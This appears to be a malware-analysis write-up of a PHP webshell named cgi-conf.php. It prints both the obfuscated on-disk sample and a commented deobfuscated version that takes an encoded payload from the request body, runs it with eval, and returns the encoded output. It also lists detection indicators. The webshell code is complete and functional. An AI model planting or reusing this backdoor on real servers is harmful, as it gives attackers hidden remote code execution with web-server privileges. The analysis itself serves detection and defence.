PHP Malware Analysis


Filename: cgi-conf.php

Tags

Encoding
  • base64_decode
  • base64_encode
Execution
  • eval
Input
  • _GET
Files
  • file_get_contents

Deobfuscated code

<?php

// Analyst note: the seven string fragments below are the webshell source
// chopped up, stored out of order and salted with '>' characters so that no
// keyword or function name is readable on disk. The on-disk sample strips the
// '>' and concatenates them in the order $r.$Y.$p.$N.$u.$W.$C; the result is
// the clear-text string held in $k at the end of this listing.
$N = 'k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W = 'base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u = 'nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p = 'or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
// In the on-disk sample this name is itself assembled with str_replace() so
// the literal "create_function" never appears; it is then called as
// create_function('', $k), which compiles $k into an anonymous function.
$g = "create_function";
$C = ';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y = '9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r = '$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
// The fully reassembled payload, identical in logic to the closure $G below.
// It is written for legacy PHP: the `$t{$i}` string-offset syntax and
// create_function() were both removed in PHP 8.0, so this exact sample only
// executes on PHP 7.x or older. The hard-coded key and the two marker strings
// (5ce24f921bbc / 7fa689200ff0) are the values to pivot on when hunting.
$k = "\$k=\"b5ef73cd\";\$kh=\"5ce24f921bbc\";\$kf=\"7fa689200ff0\";\$p=\"aOWo2okBR9FiQAlp\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
// Analyst note: this is the deobfuscated webshell body. It pulls a payload out
// of the raw request body, executes it with eval(), and prints the captured
// output back in the same framing. Every call is prefixed with '@', so nothing
// is logged on failure; a file where every statement is error-suppressed is
// itself a strong static indicator.
$G = function () {
    // XOR key shared by the request and response transforms.
    $k = "b5ef73cd";
    // Start and end markers that delimit the payload inside the request body.
    $kh = "5ce24f921bbc";
    $kf = "7fa689200ff0";
    // Fixed prefix emitted before every response.
    $p = "aOWo2okBR9FiQAlp";
    // Repeating-key XOR: byte $i of $t is combined with key byte $j, where $j
    // cycles over strlen($k). The same routine is used in both directions.
    // Note: a named function declared inside a closure is registered globally
    // the first time the closure runs, so invoking $G() a second time in the
    // same request would fail with a "cannot redeclare x()" fatal error.
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    // The shell only reacts when the raw body (php://input, i.e. the request
    // body rather than a parsed form field) contains data between the two
    // markers; for any other request it produces no output at all, which is
    // how the file avoids notice. Matching on those two marker strings in
    // request bodies is a reliable network detection for this sample.
    if (@preg_match("/5ce24f921bbc(.+)7fa689200ff0/", @file_get_contents("php://input"), $m) == 1) {
        // Capture everything the payload prints so it can be returned encoded.
        @ob_start();
        // Decode pipeline: base64 -> XOR with $k -> gzuncompress -> eval().
        // The result is executed as PHP with the web server's privileges.
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        // Encode pipeline is the reverse (gzcompress -> XOR -> base64), wrapped
        // in the same markers. A response body beginning with
        // "aOWo2okBR9FiQAlp5ce24f921bbc" therefore identifies this shell.
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
// Executed once at include time; the file has no persistence mechanism of its
// own beyond existing on disk under a web-served path.
$G();


Original code

<?php
// Analyst note: the on-disk form of the sample. No PHP function name or
// keyword from the payload is visible to a naive grep: the source is split
// into seven fragments stored in shuffled order, each salted with '>'
// characters, and the name "create_function" is hidden by inserting "uX".
$N='k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W='base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u='nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p='or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
// Removing "uX" yields the string "create_function"; building a callable's
// name with str_replace() and then calling it as $g(...) is the pattern to
// hunt for in static scans, since neither create_function nor eval appears
// literally in this file.
$g=str_replace('uX','','cuXruXeauXte_uXfunuXcuXtion');
$C=';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y='9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r='$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
// Reassemble the fragments in their true order ($r $Y $p $N $u $W $C) and
// strip the '>' salt; $k is now the clear-text webshell source.
$k=str_replace('>','',$r.$Y.$p.$N.$u.$W.$C);
// create_function('', $k) compiles $k as the body of an anonymous function,
// which is then invoked immediately. create_function() was removed in PHP
// 8.0, so this exact sample requires PHP 7.x or older to run.
$G=$g('',$k);$G();
?>